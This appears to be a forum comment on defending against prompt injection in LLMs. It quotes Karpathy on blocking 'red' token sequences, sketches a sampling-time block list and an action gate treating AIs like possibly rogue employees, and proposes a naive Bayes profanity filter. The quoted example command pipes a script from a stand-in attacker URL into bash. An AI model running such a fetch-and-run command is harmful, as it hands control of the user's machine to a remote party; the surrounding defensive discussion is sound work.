I believe that, when dealing with these very large, general-purpose LLMs, there is really no practical way to protect against any 'injection' technique, short of actually preventing certain strings from ever being completed by the LLM, similar to what Andrej Karpathy describes here (which is still not 100%, unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...
*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance.
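The "one-off blocking" that the quote dismisses can still be sketched to make the idea concrete: at sampling time, hard-clamp to zero the probability of any token that would complete a banned token sequence. This is a toy illustration (not Karpathy's code); the banned prefix and the token/probability dictionaries are made up for the example.

```python
import random

# Hypothetical blocklist of "red state" token sequences; the real set is
# far too large to enumerate, which is exactly the quote's point.
BANNED_SEQUENCES = [
    [66, 6371, 532, 82],  # illustrative prefix of a dangerous command
]

def mask_banned(context, probs):
    """Zero out tokens that would complete a banned sequence, then renormalize."""
    masked = dict(probs)
    for seq in BANNED_SEQUENCES:
        *prefix, last = seq
        # If the context already ends with the banned prefix, forbid `last`.
        if len(prefix) == 0 or context[-len(prefix):] == prefix:
            masked[last] = 0.0
    total = sum(masked.values())
    if total == 0:
        raise RuntimeError("all continuations banned")
    return {tok: p / total for tok, p in masked.items()}

def sample(context, probs, rng=random.random):
    """Sample the next token from the masked distribution."""
    probs = mask_banned(context, probs)
    r, acc = rng(), 0.0
    for tok, p in probs.items():
        acc += p
        if r < acc:
            return tok
    return tok  # guard against floating-point rounding
```

Note that this only catches exact token sequences; the same bad string can be reached through many different tokenizations, which is one reason string-level blocking alone is unsatisfying.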
The way I think about this is that we need to treat AIs like human employees who have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the standard human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate-limit their actions, etc.
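Those employee-style controls can be sketched as a gate that every model-requested action passes through before execution. Everything here is illustrative, not a real API: the class, action names, and limits are assumptions for the example.

```python
import time
import logging

logging.basicConfig(level=logging.INFO)

class ActionGate:
    """Hypothetical gate combining an allowlist, a rate limit, and an audit log."""

    def __init__(self, allowed, max_per_minute):
        self.allowed = set(allowed)        # least privilege: explicit allowlist
        self.max_per_minute = max_per_minute
        self.timestamps = []               # times of recently allowed actions

    def authorize(self, action, now=None):
        now = time.monotonic() if now is None else now
        # Verify: refuse anything outside the allowlist, and log the denial.
        if action not in self.allowed:
            logging.warning("denied action: %s", action)
            return False
        # Rate limit: keep only timestamps inside the last minute.
        self.timestamps = [t for t in self.timestamps if now - t < 60]
        if len(self.timestamps) >= self.max_per_minute:
            logging.warning("rate-limited action: %s", action)
            return False
        self.timestamps.append(now)
        logging.info("allowed action: %s", action)
        return True
```

The point is that none of this depends on understanding the model's internals; it's the same perimeter you'd put around an untrusted contractor.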
It's probably impossible to classify all possible bad actions with 100% reliability, but we could get quite far. Detecting profanity, for example, could be as simple as filtering the output through a naive Bayes classifier. Everything that's left would then be a question of risk acceptance.
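The naive Bayes idea above fits in a few lines of plain Python. This is a minimal sketch with toy, made-up training data; a real filter would be trained on a substantial labeled corpus.

```python
import math
from collections import Counter

class NaiveBayes:
    """Tiny multinomial naive Bayes over whitespace-tokenized words."""

    def __init__(self):
        self.word_counts = {"bad": Counter(), "ok": Counter()}
        self.doc_counts = {"bad": 0, "ok": 0}

    def train(self, text, label):
        self.doc_counts[label] += 1
        self.word_counts[label].update(text.lower().split())

    def classify(self, text):
        vocab = set(self.word_counts["bad"]) | set(self.word_counts["ok"])
        total_docs = sum(self.doc_counts.values())
        scores = {}
        for label in ("bad", "ok"):
            # Log prior for the class, then log likelihood of each word.
            score = math.log(self.doc_counts[label] / total_docs)
            n = sum(self.word_counts[label].values())
            for word in text.lower().split():
                # Laplace smoothing so unseen words don't zero out the score.
                count = self.word_counts[label][word] + 1
                score += math.log(count / (n + len(vocab)))
            scores[label] = score
        return max(scores, key=scores.get)
```

A classifier like this catches surface-level problems cheaply; it does nothing against the injection attacks discussed above, which is why it only shrinks the residual risk rather than eliminating it.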